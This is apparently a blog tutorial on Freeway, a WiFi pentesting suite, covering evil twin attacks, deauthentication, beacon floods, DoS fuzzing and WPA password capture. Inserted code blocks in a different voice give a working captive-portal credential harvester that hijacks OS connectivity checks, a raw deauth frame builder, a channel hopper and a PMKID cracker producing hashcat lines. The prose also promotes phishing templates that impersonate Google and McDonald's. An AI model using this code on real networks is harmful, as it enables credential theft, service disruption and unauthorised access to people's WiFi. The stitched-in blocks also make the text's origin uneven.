Freeway for Network Pentesting

FLOCK4H
May 18, 2024


In this article we will focus on exploiting weaknesses of the WiFi protocol (IEEE 802.11) using Freeway. Most of the attacks below abuse one property of 802.11: management frames (beacons, probes, authentication, deauthentication) are sent unauthenticated unless the network enforces Protected Management Frames (802.11w), so anyone with an injection-capable adapter can forge them.

NOTE: An adapter supporting monitor mode and frame injection is required for the actions described below. Popular choices include the TP-Link WN722N and ALFA adapters. Check the hardware revision: the WN722N v1 (Atheros AR9271) works with the in-kernel ath9k_htc driver, while v2/v3 (Realtek RTL8188EUS) need an out-of-tree driver before monitor mode and injection work. Confirm support by checking that "monitor" is listed under "Supported interface modes" in the output of iw list.

1. What is Freeway?

Freeway is a Python network pentesting suite that bundles the attack, sniffing and audit techniques covered below. It is meant for cybersecurity professionals and beginners alike, as an aid in assessing wireless network security.

2. Why Freeway?

There are many scripts, tools and suites, but very few make it this easy. With a user-friendly CLI and all techniques in one place, it is hard to get unsatisfying results. Comparable tools are mdk4 and the aircrack-ng suite.

3. Introduction

Sniffing: WiFi frames are radio signals in the air that carry the address of the device sending them (unless spoofed), the address they are meant for, and their payload. With an adapter in monitor mode we can capture every frame on a channel, not only the ones addressed to us, and listen to and record them.

Audit: from captured frames we can determine very specific information, including the MAC addresses of sender and receiver, channel, signal strength, ESSID (the broadcast network name), probe requests, uptime (from the beacon timestamp), encryption settings, and every client associated with the AP (access point).

Attacks: there are many methods for network disruption, capture of password material (handshakes and PMKIDs) and denial of service (DoS); we will cover most of them later.

4. Setup

In this section we will focus on getting Freeway to work on your machine so that it can be run from any directory in the terminal (e.g., /home/kali).

Here’s all that you need:

  • Any Linux distribution OS (Kali, Parrot, Raspbian, etc.)
  • Network adapter supporting monitor mode and frame injection
  • ‘git’ installed (sudo apt-get install git)
  • Python 3.11+ with pip

Now, one easy step:

$ sudo pip install 3way

NOTE: On recent Debian-based distributions (including current Kali) pip refuses system-wide installs by default and reports "externally-managed-environment"; in that case install into a virtual environment, or pass --break-system-packages if you accept the risk to your system Python.

We have successfully installed Freeway.

5. Pentesting

Let’s get straight to the point.

We can easily run Freeway by executing one command:

$ sudo Freeway

This will display the CLI (Command Line Interface) and guide the user through initial configuration.

NOTE: You must agree to the EULA when prompted; once accepted, it should never appear again.

Choose the interface that supports monitor mode.

Great, we are now in the Freeway menu.

For every feature you can select additional parameters (the Packet Monitor prompt is the example shown in the original post).

★ Evil Twin

This freshly added option hosts a rogue access point with a captive portal. The legitimate-looking AP asks the user to log in on a web page before internet access is granted, which makes credential harvesting easy and feasible.

Let's focus on how an Evil Twin attack actually operates, as it is not only about creating an AP with a captive portal. A twin is a clone of an existing AP: same BSSID (MAC address), same SSID. Client devices usually join the known network with the strongest signal, so what happens if we broadcast a stronger copy of a legitimate one? Keep in mind that a client holding a saved WPA2/WPA3 profile will not silently complete a connection to a twin that cannot prove knowledge of the network key, so in practice the twin is combined with a deauth against the real AP and relies on the user reconnecting by hand.

Once a device has associated with the AP, its operating system automatically sends a connectivity-check request to see whether it is behind a login page, and we reroute that request to our /index.html. After the user enters credentials and clicks submit, we capture the data directly in the terminal.

Evil Twin Summary

Freeway includes 3 credential-harvesting templates, google, mrhacker (shown in the screenshot in the original post) and mcd (McDonald's), plus a non-harmful Valentines one. We can easily create our own template and attach images or large CSS files; those are served over our "legitimate" network as well. There are thousands of possibilities, from tricking a user into downloading or uploading a file to getting them to log in to Gmail. Evil Twin should be used with caution, as it can compromise whole businesses.
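The redirect step described above, as an added example that is not Freeway's portal code: the routing logic a captive portal needs, together with the connectivity-check URLs the major operating systems request right after association. Any reply other than the one the OS expects makes it show its "sign in to network" prompt, and the portal's own page then captures the form post. The hostnames listed, the form field names and the listen port are assumptions, and the HTML is a constructed placeholder. On a real evil twin every DNS name must additionally resolve to the portal host (for example with dnsmasq), which this block does not do.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

PORTAL_PATH = "/index.html"
LOGIN_PATH = "/login"

# Connectivity-check URLs polled by common OSes after joining a network (assumed current;
# vendors change them occasionally). Each expects a specific reply: Android a 204, Apple a
# page containing "Success", Windows the text "Microsoft Connect Test". Anything else, such
# as our redirect, makes the OS treat the network as captive and open the sign-in page.
OS_PROBES = {
    ("connectivitycheck.gstatic.com", "/generate_204"): "android",
    ("captive.apple.com", "/hotspot-detect.html"): "apple",
    ("www.msftconnecttest.com", "/connecttest.txt"): "windows",
    ("detectportal.firefox.com", "/canonical.html"): "firefox",
}

# Constructed placeholder template; Freeway's templates (google, mcd, ...) are full pages.
PORTAL_HTML = b"""<html><body><h1>Guest WiFi</h1>
<form method="post" action="/login">
<input name="username"><input name="password" type="password"><input type="submit">
</form></body></html>"""

CAPTURED = []   # credential dicts land here; the handler also prints them


def probe_os(host: str, path: str):
    """Name of the OS whose connectivity check this request is, or None for ordinary traffic."""
    return OS_PROBES.get((host.split(":")[0].lower(), path))


def route(method: str, host: str, path: str):
    """Decide what to do with a request: ('page', ...), ('capture', ...) or ('redirect', location)."""
    if method == "POST" and path == LOGIN_PATH:
        return ("capture", LOGIN_PATH)
    if method == "GET" and path == PORTAL_PATH:
        return ("page", PORTAL_PATH)
    # Everything else, OS probes included, is bounced to the portal page.
    return ("redirect", PORTAL_PATH)


def capture_credentials(body: bytes) -> dict:
    """Flatten an application/x-www-form-urlencoded login post into a dict (first value per field)."""
    form = parse_qs(body.decode("utf-8", "replace"))
    return {k: v[0] for k, v in form.items()}


class PortalHandler(BaseHTTPRequestHandler):
    def _dispatch(self, method):
        host = self.headers.get("Host", "")
        action, target = route(method, host, self.path)
        if action == "redirect":
            origin = probe_os(host, self.path)
            if origin:
                print("connectivity check from", origin, "client", self.client_address[0])
            self.send_response(302)
            self.send_header("Location", target)
            self.end_headers()
        elif action == "page":
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(PORTAL_HTML)
        else:
            length = int(self.headers.get("Content-Length", "0"))
            creds = capture_credentials(self.rfile.read(length))
            CAPTURED.append(creds)
            print("captured from", self.client_address[0], creds)
            self.send_response(302)          # send the victim somewhere plausible afterwards
            self.send_header("Location", PORTAL_PATH)
            self.end_headers()

    def do_GET(self):
        self._dispatch("GET")

    def do_POST(self):
        self._dispatch("POST")


if __name__ == "__main__":
    # Bind on the rogue AP's gateway address, port 80 (assumed; needs root). All DNS must point here.
    HTTPServer(("0.0.0.0", 80), PortalHandler).serve_forever()
```

Run it as root on the interface that hosts the rogue AP and point every DNS answer at that address; the first request from a freshly associated phone will be one of the probes in OS_PROBES, and the 302 is what triggers the sign-in prompt.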

★ Packet Monitor

Choose addons and filters or just press enter to scan nearby WiFi environment.

Network packet monitoring is a technique for obtaining information that is normally not visible to a network adapter in ordinary managed mode.

To protect my devices and those of others, I'm not going to post a screenshot of the results screen; this is for you to check out yourself.

Packet Monitor Summary

A powerful tool for exploring the wireless environment and gathering information. It captures information on all APs and clients, including PMKIDs and 4-way handshakes in hashcat-crackable format (more on that later), the clients connected to each AP, the channel the router transmits on and its signal strength, and it resolves manufacturer names from the MAC address prefix (OUI).

★ Deauth

A deauthentication attack is a method of disconnecting client(s) from an AP. The attacker injects deauthentication frames with a spoofed source address: frames that appear to come from the AP are addressed either to a specific client or to the broadcast address to kick all clients at once (frames can also be sent in the other direction, appearing to come from the client). Because deauthentication is an unauthenticated management frame, the receiver honours it unless Protected Management Frames (802.11w, PMF) were negotiated, as they are mandatory for WPA3 and optional on many WPA2 networks.

The screenshot below presents Mass Deauth option of the Freeway

Usually the kicked devices try to reconnect again and again; that is the moment to capture the WPA 4-way handshake (EAPOL frames) that every reconnection produces.

Deauthentication Attack Summary

Freeway has many options that make the attack safer or more aggressive, including:

  • Signal range (dBm)
  • Specific channel
  • Single MAC address
  • Single ESSID
  • Mass Deauth (broadcast)
  • and more..

While deauthing is easy to understand and perform and needs no further elaboration, please keep in mind that it is also very disruptive.

NOTE: Freeway creates one thread for each AP or client, in order to maximize the efficiency.
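How a deauthentication frame is laid out on the wire, and the check a practitioner should make before sending any: parse the RSN information element from the target AP's beacon and read its MFPC/MFPR (Protected Management Frames) bits. This is an added example and not Freeway's code, which the article does not show. The beacon IE blobs and MAC addresses are constructed for illustration; actually transmitting the frame needs a raw socket or scapy on a monitor-mode interface and is deliberately not part of the block.

```python
import struct

# Frame control for a management (type 0) / deauthentication (subtype 12) frame:
# protocol version 0, type 0, subtype 0xC -> first byte 0xC0, flags byte 0x00.
FC_DEAUTH = 0x00C0
REASON_CLASS3_FROM_NONASSOC = 7   # "class 3 frame received from nonassociated STA", the usual choice
BROADCAST = "ff:ff:ff:ff:ff:ff"
IE_SSID, IE_DS_PARAM, IE_RSN = 0, 3, 48


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def build_deauth(bssid: str, target: str = BROADCAST,
                 reason: int = REASON_CLASS3_FROM_NONASSOC, seq: int = 0) -> bytes:
    """Raw 802.11 deauth frame that appears to come from `bssid` and is addressed to `target`.

    addr1 = receiver (client or broadcast), addr2 = transmitter (spoofed AP), addr3 = BSSID.
    Sequence control packs the 12-bit sequence number above a 4-bit fragment number.
    """
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0,
                         mac_bytes(target), mac_bytes(bssid), mac_bytes(bssid),
                         (seq << 4) & 0xFFFF)
    return header + struct.pack("<H", reason)   # the body is just the 2-byte reason code


def parse_ies(blob: bytes):
    """Split the tagged-parameter area of a beacon/probe response into (tag, body) pairs."""
    ies, off = [], 0
    while off + 2 <= len(blob):
        tag, length = blob[off], blob[off + 1]
        ies.append((tag, blob[off + 2: off + 2 + length]))
        off += 2 + length
    return ies


def find_ie(ies, tag):
    return next((body for t, body in ies if t == tag), None)


def rsn_capabilities(rsn: bytes) -> dict:
    """Walk the RSN IE to the optional RSN Capabilities field and read the PMF bits.

    Layout: version(2) | group cipher(4) | pairwise count(2) + suites(4 each) |
            AKM count(2) + suites(4 each) | capabilities(2) | ...
    Capabilities bit 6 = MFPR (PMF required), bit 7 = MFPC (PMF capable).
    """
    off = 2 + 4
    (pairwise_count,) = struct.unpack_from("<H", rsn, off)
    off += 2 + 4 * pairwise_count
    (akm_count,) = struct.unpack_from("<H", rsn, off)
    akms = [rsn[off + 2 + 4 * i: off + 6 + 4 * i] for i in range(akm_count)]
    off += 2 + 4 * akm_count
    if off + 2 > len(rsn):                       # capabilities field absent => no PMF
        return {"mfpc": False, "mfpr": False, "akms": akms}
    (caps,) = struct.unpack_from("<H", rsn, off)
    return {"mfpc": bool(caps & 0x80), "mfpr": bool(caps & 0x40), "akms": akms}


def deauth_verdict(ies) -> str:
    """What an unprotected deauth will achieve against an AP advertising these IEs."""
    rsn = find_ie(ies, IE_RSN)
    if rsn is None:
        return "effective: no RSN IE, management frames are unprotected"
    caps = rsn_capabilities(rsn)
    if caps["mfpr"]:
        return "ineffective: PMF required, unprotected deauth is discarded"
    if caps["mfpc"]:
        return "partial: PMF optional, clients that negotiated it ignore the frame"
    return "effective: PMF not supported"


# Constructed sample RSN IE bodies, as found after the fixed beacon fields.
# WPA2-PSK/CCMP without PMF: AKM 00-0F-AC-02, RSN capabilities 0x0000.
RSN_WPA2_NO_PMF = bytes.fromhex("0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")
# WPA3-SAE/CCMP with PMF required: AKM 00-0F-AC-08, capabilities 0x00C0 (MFPC|MFPR), little-endian on the wire.
RSN_WPA3_PMF_REQUIRED = bytes.fromhex("0100" "000fac04" "0100" "000fac04" "0100" "000fac08" "c000")


def beacon_ies(ssid: str, channel: int, rsn: bytes) -> bytes:
    """Constructed tagged-parameter area: SSID, DS Parameter Set (channel) and RSN."""
    s = ssid.encode()
    return (bytes([IE_SSID, len(s)]) + s
            + bytes([IE_DS_PARAM, 1, channel])
            + bytes([IE_RSN, len(rsn)]) + rsn)


BEACON_IES_WPA2 = beacon_ies("CorpWiFi", 6, RSN_WPA2_NO_PMF)          # constructed
BEACON_IES_WPA3 = beacon_ies("CorpWiFi-WPA3", 36, RSN_WPA3_PMF_REQUIRED)  # constructed

if __name__ == "__main__":
    print(build_deauth("00:11:22:33:44:55").hex())      # constructed BSSID, broadcast target
    for blob in (BEACON_IES_WPA2, BEACON_IES_WPA3):
        ies = parse_ies(blob)
        print(find_ie(ies, IE_SSID).decode(), "->", deauth_verdict(ies))
```

The verdict is the part worth automating in a real engagement: against a PMF-required (WPA3) network a deauth flood only costs airtime and makes noise in the logs, so it is better to know that from one beacon than to find out by failing.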

★ Beacon Flood

A beacon is a frame that every AP sends periodically (typically about every 100 ms) to announce the network to nearby WiFi scanners, such as phones and computers. Flooding the area with forged beacons makes fake access points appear. Clients can see these access points but cannot connect to them, since nothing answers their authentication and association requests.

To make the attack more authentic, fake clients are generated alongside the fake networks.

NOTE: The "total" counter is not just the sum of beacons and clients; probe requests and probe responses are sent as well.

Results:

Beacon Flood Summary

An invasive technique that confuses nearby WiFi scanners by injecting forged or malformed beacon frames. It also tests how well scanners cope with unusual frames.

★ Packet Fuzzer

Fuzzing means sending malformed or unexpected packets to a device and observing how it reacts. Below we cover several network fuzzing methods; they include sending malformed or oversized beacon frames, among others.

1. Packet Replay

→ Uses the adapter's monitor mode to capture frames and retransmit them. This can trigger unexpected behaviour in any device, APs and clients alike, so exercise caution.

2. RTS/CTS flood

→ Request To Send and Clear To Send are control frames used to reserve the medium; their duration field tells every station within range that the channel is busy for that long. Flooding them signals a permanently busy channel and can starve legitimate stations, resulting in a denial of service (DoS).

3. Auth/ Assoc spam

→ Attempts to connect fake clients to the network. Processing an authentication or association request costs the AP more than sending it costs us, so the AP is kept busy and may refuse new legitimate associations. This method is very effective for testing a device's ability to handle a large number of clients; once its client table fills up, some APs become unresponsive or reboot.

4. Probe Requests spam

Probes can be divided into two mechanisms:

  • Probe Requests: sent by a device searching for networks; they carry the device's MAC address and either the SSID it is looking for or a wildcard SSID that addresses every AP in range
  • Probe Responses: an AP answers each probe request that matches it (an AP with a hidden SSID answers only probes naming that SSID); the response carries the SSID, supported data rates and other parameters that let the device decide whether it can connect and which services are available

By sending many probe requests we keep the AP busy, because it has to answer every one of them, and building a response takes more work than sending a pre-built request.

Packet Fuzzer Summary

Most devices are susceptible to one or more fuzzing methods, which makes the packet fuzzer a valuable tool for WiFi penetration testing. Freeway gathers many techniques in one place, so there is no need to hunt for scripts or type individual commands.

★ Network Audit

Sometimes we prefer to audit a single network rather than collect a pile of unnecessary data. The audit provides a comprehensive listing of everything known about the target, including the clients associated with it.

(not a full screenshot due to big resolution)

Network Audit Summary

Audit becomes useful once we have already scanned the environment and obtained either the MAC address (BSSID) or the ESSID (name) of the target. The information gathered can serve many purposes. Like the Packet Monitor, the network audit also captures PMKIDs and handshakes.

★ Channel Hopper

This is the last, but not least, feature of Freeway. Every WiFi radio, whether in a client or an AP, transmits on a specific channel. The most popular 2.4 GHz channels are 1, 6 and 11 (the only three that do not overlap); 5 GHz channels range from 36 to 165, and which of them are allowed, and which require DFS radar detection before use, depends on the regulatory domain. When a channel is busy a network can switch to another one, but when the entire range is busy... well, that's a problem.

Channel Hopper Summary

The less interference the better, except for penetration testers: we aim to create interference and observe how devices react. Dynamically changing the channel of our adapter increases the chance of a successful attack, because a monitor-mode adapter only hears and injects on the channel it is currently tuned to.
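A minimal hopper, as an added example that is not Freeway's implementation: it visits the three non-overlapping 2.4 GHz channels first, then the remaining 2.4 GHz channels, then the non-DFS 5 GHz channels, and retunes the adapter with `iw dev <iface> set channel <n>`, which only works on an interface in monitor mode. The interface name, the dwell time and the decision to skip DFS channels (52 to 144) are choices made here; the command runner is injectable so the schedule can be exercised without a radio.

```python
import subprocess
import time

# 2.4 GHz: the non-overlapping 1/6/11 carry most traffic, so they come first; 12 and 13 are region-dependent.
CHANNELS_24 = [1, 6, 11, 2, 3, 4, 5, 7, 8, 9, 10, 12, 13]
# 5 GHz: non-DFS channels only (UNII-1 and UNII-3); 52 to 144 require radar detection and are skipped here.
CHANNELS_5_NON_DFS = [36, 40, 44, 48, 149, 153, 157, 161, 165]


def hop_schedule(bands=("2.4", "5")):
    """Ordered list of channels to visit in one round, for the requested bands."""
    order = []
    if "2.4" in bands:
        order += CHANNELS_24
    if "5" in bands:
        order += CHANNELS_5_NON_DFS
    return order


def set_channel(iface, channel, runner=subprocess.run):
    """Retune a monitor-mode interface; iw exits non-zero if the interface is managed or associated."""
    return runner(["iw", "dev", iface, "set", "channel", str(channel)], check=True)


def hop(iface, channels, dwell=0.25, rounds=1, runner=subprocess.run, sleep=time.sleep):
    """Cycle through `channels` `rounds` times, staying `dwell` seconds on each; returns the visit log."""
    visited = []
    for _ in range(rounds):
        for ch in channels:
            set_channel(iface, ch, runner)
            visited.append(ch)
            sleep(dwell)
    return visited


if __name__ == "__main__":
    # Interface name assumed; needs root and an adapter already in monitor mode.
    print(hop("wlan0mon", hop_schedule(), dwell=0.5, rounds=1))
```

The dwell time is the trade-off: too short and the adapter misses beacons (sent roughly every 100 ms) on busy channels, too long and a short-lived handshake on another channel goes unrecorded.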

In the next sections of this article we describe the tool in more depth.

So, if you are new to Linux, feel uncomfortable with its terminal, or just wanted to test your own WiFi security, I hope you found the information you were looking for.

Happy Hacking! 🦠

6. Quick Access

Freeway's functions can also be called directly from the terminal. As already presented, every function has a number and a name; those are the -a arguments (short for "action"), for example:

sudo Freeway -i wlan2 -a monitor

runs the aforementioned Packet Monitor on the wlan2 interface.

Okay, but where did the addons and filters of the Packet Monitor go?

Well, I need to quickly mention that this exact part was the hardest one to write yet, because Medium keeps removing it and replacing it with the above block of code for an unknown reason, every time I leave the app to get a link or to check something.

Anyway, providing only the -a argument will not let you jump straight into the action. Instead, it displays the CLI asking for additional parameters:

So, in order to skip the whole CLI process, the -p argument was ✨ invented ✨. It uses the same syntax as the CLI, for example:

sudo Freeway -i wlan2 -a monitor -p 1,2,a

NOTE: The ‘-a’ argument can also be provided using feature numbers e.g., 1 for monitor

7. Password Capture

Using the Packet Monitor or the Network Audit we can capture PMKIDs and 4-way handshakes. A PMKID travels in the first EAPOL message of the handshake, which the AP sends, so no client needs to be present (though not every AP includes one); a crackable handshake needs two consecutive EAPOL messages (M1+M2 or M2+M3). No worries, the tool does this part of the job for us. Captures are saved to the /caps folder of the Freeway directory (/usr/local/share/3way) in a hashcat-crackable format (mode 22000 is the current one for both PMKIDs and handshakes). For obvious reasons we are not going to cover the cracking part in this article, because it is extremely easy.
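What the capture is used for afterwards, as an added example that is neither Freeway's nor hashcat's code: the PMKID in the AP's first EAPOL message is an HMAC over the PMK and the two MAC addresses, and for WPA/WPA2-PSK the PMK itself is derived from the passphrase and the SSID, so one captured frame can be checked offline against candidate passphrases. The block derives the PMK, computes a PMKID, writes it in hashcat's 22000 line format and recovers a constructed passphrase from a constructed wordlist. The MAC addresses, SSID, passphrase and wordlist are constructed; the "password"/"IEEE" pair is the PMK test vector from the 802.11 standard. This only applies to PSK networks: WPA3-SAE derives the PMK from the SAE exchange, so its PMKID reveals nothing about the passphrase.

```python
import hashlib
import hmac

PBKDF2_ROUNDS = 4096   # fixed by WPA2-PSK, which is why every guess is comparatively expensive


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes) for WPA/WPA2-PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, 32)


def pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), the value carried in EAPOL message 1."""
    data = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def hc22000_pmkid_line(pmkid_value: bytes, ap_mac: str, client_mac: str, ssid: str) -> str:
    """hashcat 22000 record for a PMKID: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_hex*** (last three fields unused)."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_value.hex(), ap_mac.replace(":", ""), client_mac.replace(":", ""), ssid.encode().hex())


def parse_hc22000_pmkid(line: str):
    """Inverse of hc22000_pmkid_line: (pmkid bytes, ap_mac, client_mac, ssid)."""
    fields = line.strip().split("*")
    if fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID record")
    as_mac = lambda h: ":".join(h[i:i + 2] for i in range(0, 12, 2))
    return bytes.fromhex(fields[2]), as_mac(fields[3]), as_mac(fields[4]), bytes.fromhex(fields[5]).decode()


def crack_pmkid(line: str, candidates):
    """Offline check of candidate passphrases against one captured PMKID; returns the match or None."""
    captured, ap_mac, client_mac, ssid = parse_hc22000_pmkid(line)
    for candidate in candidates:
        guess = pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac)
        if hmac.compare_digest(guess, captured):
            return candidate
    return None


# Constructed lab capture: one AP, one client and the passphrase we will "recover".
AP_MAC, CLIENT_MAC, SSID = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "CorpWiFi"
SECRET = "correct horse battery"
CAPTURED_LINE = hc22000_pmkid_line(
    pmkid(pmk_from_passphrase(SECRET, SSID), AP_MAC, CLIENT_MAC), AP_MAC, CLIENT_MAC, SSID)
WORDLIST = ["password", "CorpWiFi2024", "correct horse battery", "letmein"]   # constructed

if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("recovered:", crack_pmkid(CAPTURED_LINE, WORDLIST))
```

The loop in crack_pmkid is exactly what hashcat parallelises on a GPU; the only input it needs from the air is the one line printed above, which is why a PMKID capture is so much quicker to obtain than a full handshake.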

That being said, we have successfully reached the end of this article. Freeway has a lot more to cover, but I would not want you to miss the fun of discovering new things.

I’m glad that you reached this far, thank you for your time and wish you the best wherever you are in your hacking journey!

I'm new to writing on Medium, so if you appreciate the article, please leave me a follow, share it, like it, or whatever.

